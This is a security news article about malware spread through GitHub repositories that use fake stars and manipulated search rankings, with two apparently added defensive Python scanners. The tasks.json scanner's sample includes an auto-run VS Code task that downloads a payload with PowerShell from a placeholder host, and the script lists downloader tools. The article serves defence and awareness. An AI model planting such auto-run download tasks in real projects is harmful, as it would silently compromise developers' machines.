Threat actors are now taking advantage of GitHub's search functionality to trick unsuspecting users looking for popular repositories into downloading spurious counterparts that serve malware.
The latest assault on the open-source software supply chain involves concealing malicious code within Microsoft Visual Code project files that's designed to download next-stage payloads from a remote URL, Checkmarx said in a report shared with The Hacker News.
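The report describes project files that fetch a next-stage payload from a remote URL when the project is opened. One defensive check a reviewer can run over a cloned repository is to parse its VS Code tasks file and flag any task that both auto-runs on folder open and reaches out to the network. This is an added example, not Checkmarx's tooling; it assumes the auto-run mechanism is VS Code's `runOptions.runOn: folderOpen` in `.vscode/tasks.json`, that the file is strict JSON (real files may carry comments that `json` will reject), and the sample document and URL below are constructed placeholders, not indicators from the report.

```python
import json
import re

# Constructed sample .vscode/tasks.json (placeholder URL, not an IoC):
# one ordinary build task and one auto-run task that downloads a file.
SAMPLE_TASKS_JSON = r'''
{
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build" },
    {
      "label": "prepare",
      "type": "shell",
      "command": "powershell",
      "args": ["-c", "iwr https://example.invalid/stage2 -OutFile s.7z"],
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}
'''

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Common download helpers on Windows/Unix shells; extend as needed (assumption).
DOWNLOADERS = ("curl", "wget", "iwr", "invoke-webrequest",
               "downloadstring", "bitsadmin", "certutil")

def flatten_command(task):
    """Join a task's command and args into one string for inspection."""
    parts = [task.get("command", "")]
    # VS Code allows args as plain strings or {"value": ..., "quoting": ...}.
    for arg in task.get("args", []):
        parts.append(arg if isinstance(arg, str) else arg.get("value", ""))
    return " ".join(p for p in parts if p)

def find_suspicious_tasks(tasks_json_text):
    """Return labels of tasks that auto-run on folder open AND touch the network."""
    doc = json.loads(tasks_json_text)
    hits = []
    for task in doc.get("tasks", []):
        auto_run = task.get("runOptions", {}).get("runOn") == "folderOpen"
        cmd = flatten_command(task).lower()
        reaches_network = bool(URL_RE.search(cmd)) or any(d in cmd for d in DOWNLOADERS)
        if auto_run and reaches_network:
            hits.append(task.get("label", "<unlabelled>"))
    return hits

if __name__ == "__main__":
    print(find_suspicious_tasks(SAMPLE_TASKS_JSON))  # ['prepare']
```

A hit is a reason to read the task before trusting the repository, not proof of malice; legitimate projects rarely need a network fetch to run unprompted on open.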
"Attackers create malicious repositories with popular names and topics, using techniques like automated updates and fake stars to boost search rankings and deceive users," security researcher Yehuda Gelb said.
The idea is to manipulate GitHub's search rankings so that threat actor-controlled repositories rise to the top when users filter and sort results by most recent update, and to inflate their apparent popularity with bogus stars added from fake accounts.
In doing so, the attack lends a veneer of legitimacy and trust to the fraudulent repositories, effectively deceiving developers into downloading them.
"In contrast to past incidents where attackers were found to add hundreds or thousands of stars to their repos, it appears that in these cases, the attackers opted for a more modest number of stars, probably to avoid raising suspicion with an exaggerated number," Gelb said.
It's worth pointing out that previous research from Checkmarx late last year uncovered a black market comprising online stores and chat groups that are selling GitHub stars to artificially boost a repository's popularity, a technique referred to as star inflation.
What's more, a majority of these repositories are disguised as legitimate projects related to popular games, cheats, and tools, adding another layer of sophistication to make it harder to distinguish them from benign code.
Some repositories have been observed downloading an encrypted .7z file containing an executable named "feedbackAPI.exe" that has been inflated to 750 MB in a likely attempt to evade antivirus scanning and ultimately launch malware that shares similarities with Keyzetsu clipper.
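The 750 MB executable above is a classic file-inflation trick: a small binary padded with filler so it exceeds the size limits of many scanners. A cheap triage check is to measure how much of a large file is low-entropy filler. This is an added example, not code from the report; the 50 MB size floor, the 0.8 filler ratio and the entropy cutoff are assumptions to tune per environment, and the sample bytes are constructed (random "real" content followed by zero padding).

```python
import math
import os
from collections import Counter

def chunk_entropy(chunk):
    """Shannon entropy in bits per byte; 0.0 for a run of identical bytes."""
    n = len(chunk)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(chunk).values())

def padding_ratio(data, chunk_size=4096, entropy_threshold=0.5):
    """Fraction of fixed-size chunks that look like filler (near-zero entropy)."""
    offsets = range(0, len(data), chunk_size)
    filler = sum(1 for off in offsets
                 if chunk_entropy(data[off:off + chunk_size]) < entropy_threshold)
    return filler / max(1, len(offsets))

def looks_inflated(data, min_size=50 * 1024 * 1024, ratio_threshold=0.8):
    """True when a large file is mostly filler, i.e. probably padded to dodge scanners.
    Caveat: padding with random bytes would defeat this entropy check; pair it with
    a size-vs-declared-sections check for PE files in real use (assumption)."""
    return len(data) >= min_size and padding_ratio(data) >= ratio_threshold

# Constructed samples: 64 KiB of random content, then the same content inflated
# with 2 MiB of zero bytes. Thresholds are lowered for the demo.
SAMPLE_REAL = os.urandom(64 * 1024)
SAMPLE_INFLATED = SAMPLE_REAL + b"\x00" * (2 * 1024 * 1024)

if __name__ == "__main__":
    print(round(padding_ratio(SAMPLE_INFLATED), 2))          # about 0.97
    print(looks_inflated(SAMPLE_INFLATED, min_size=1 << 20))  # True
    print(looks_inflated(SAMPLE_REAL, min_size=1 << 20))      # False
```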
The Windows malware, which came to light early last year, is often distributed through pirated software such as Evernote. It's capable of diverting cryptocurrency transactions to attacker-owned wallets by substituting the wallet address copied in the clipboard.
The findings underscore the due diligence that developers must follow when downloading source code from open-source repositories, not to mention the dangers of solely relying on reputation as a metric to evaluate trustworthiness.
"The use of malicious GitHub repositories to distribute malware is an ongoing trend that poses a significant threat to the open-source ecosystem," Gelb said.
"By exploiting GitHub's search functionality and manipulating repository properties, attackers can lure unsuspecting users into downloading and executing malicious code."
The development comes as Phylum said it discovered an uptick in the number of spam (i.e., non-malicious) packages being published to the npm registry by a user named ylmin to orchestrate a "massive automated crypto farming campaign" that abuses the Tea protocol.
"The Tea protocol is a web3 platform whose stated goal is compensating open source package maintainers, but instead of cash rewards, they are rewarded with TEA tokens, a cryptocurrency," the company's research team said.
"The Tea protocol is not even live yet. These users are farming points from the 'Incentivized Testnet,' apparently with the expectation that having more points in the Testnet will increase their odds of receiving a later airdrop."